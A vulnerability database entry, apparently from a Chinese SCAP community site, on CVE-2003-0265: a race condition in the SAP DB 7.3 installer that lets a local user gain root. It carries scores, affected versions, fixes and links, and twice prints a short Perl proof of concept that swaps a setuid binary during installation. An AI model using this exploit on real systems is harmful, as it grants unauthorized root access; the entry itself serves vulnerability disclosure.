CVE-2003-0265
CVSS6.2
发布时间 :2003-05-27 00:00:00
修订时间 :2016-10-17 22:31:23
NMCOES    

[原文]Race condition in SDBINST for SAP database 7.3.0.29 creates critical files with world-writable permissions before initializing the setuid bits, which allows local attackers to gain root privileges by modifying the files before the permissions are changed.


[CNNVD]SAP数据库SDBINST竞争条件漏洞(CNNVD-200305-071)

        SAP数据库7.3.0.29版本的SDBINST中的竞争条件在初始化setuid位之前创建具有世界可写权限的重要文件,本地攻击者可以通过在权限被更改之前修改文件获取根权限。

- CVSS (基础分值)

CVSS分值: 6.2 [中等(MEDIUM)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:sap:sap_db:7.4.3.7_beta
cpe:/a:sap:sap_db:7.3.29

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0265
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0265
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200305-071
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105232424810097&w=2
(UNKNOWN)  BUGTRAQ  20030507 SAP database local root vulnerability during installation. (fwd)
http://www.securityfocus.com/bid/7421
(VENDOR_ADVISORY)  BID  7421

- 漏洞信息

SAP数据库SDBINST竞争条件漏洞
中危 竞争条件
2003-05-27 00:00:00 2005-10-20 00:00:00
本地  
        SAP数据库7.3.0.29版本的SDBINST中的竞争条件在初始化setuid位之前创建具有世界可写权限的重要文件,本地攻击者可以通过在权限被更改之前修改文件获取根权限。

- 公告与补丁

        This vulnerability has been reported to be fixed in the current version of the software:
        SAP DB 7.3 .29
        

- 漏洞信息 (22531)

SAP Database 7.3/7.4 SDBINST Race Condition Vulnerability (EDBID:22531)
linux local
2003-04-23 Verified
0 Larry W. Cashdollar
N/A [点击下载]
source: http://www.securityfocus.com/bid/7421/info

SAP Database SDBINST has been reported prone to a race condition vulnerability.

It has been reported that the SAP Database install tool SDBINST may perform operations non-atomically when installing the SAP database. This condition may open a window of opportunity for a malicious user to replace one of two SAP Database files with a malicious file, before SBDINST sets the setuid bit on the files.

An attacker may exploit this vulnerability to gain root privileges. 

#!/bin/perl

while (1) {

$test =`grep -sh PRECOM.ins
/tmp/sapdb-server-linux-32bit-i386-7_3_0_29/y/config/install/LIST*`;

if ( $test =~ /PRECOM/ ) {
system("cp /home/lwc/run /usr/sapdb/depend/pgm/lserver");
exit(1);
}

}

		

- 漏洞信息

11915
SAP DB SDBINST Permission Race Condition Privilege Elevation
Local Access Required Race Condition
Loss of Integrity
Exploit Public

- 漏洞描述

SAP DB contains a flaw that may allow a local malicious user to overwrite the contents of files during installation. The issue is due to a race condition in the installation, a period of several seconds passes between decompressing the files and setting the setuid bits. It is possible that the flaw may allow a malicious local user to overwrite the contents of the files between decompression and setting the setuid bits resulting in a loss of integrity.

- 时间线

2003-04-27 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 7.4.03 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

SAP Database SDBINST Race Condition Vulnerability
Race Condition Error 7421
No Yes
2003-04-23 12:00:00 2009-07-11 09:07:00
Discovery of this vulnerability has been credited to Larry W. Cashdollar (http://vapid.dhs.org).

- 受影响的程序版本

SAP DB 7.4.3 .7 Beta
SAP DB 7.3 .29
SAP DB 7.4.3

- 不受影响的程序版本

SAP DB 7.4.3

- 漏洞讨论

SAP Database SDBINST has been reported prone to a race condition vulnerability.

It has been reported that the SAP Database install tool SDBINST may perform operations non-atomically when installing the SAP database. This condition may open a window of opportunity for a malicious user to replace one of two SAP Database files with a malicious file, before SBDINST sets the setuid bit on the files.

An attacker may exploit this vulnerability to gain root privileges.

- 漏洞利用

The following proof of concept has been supplied:

#!/bin/perl

while (1) {

$test =`grep -sh PRECOM.ins
/tmp/sapdb-server-linux-32bit-i386-7_3_0_29/y/config/install/LIST*`;

if ( $test =~ /PRECOM/ ) {
system("cp /home/lwc/run /usr/sapdb/depend/pgm/lserver");
exit(1);
}

}

- 解决方案

This vulnerability has been reported to be fixed in the current version of the software:


SAP DB 7.3 .29

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站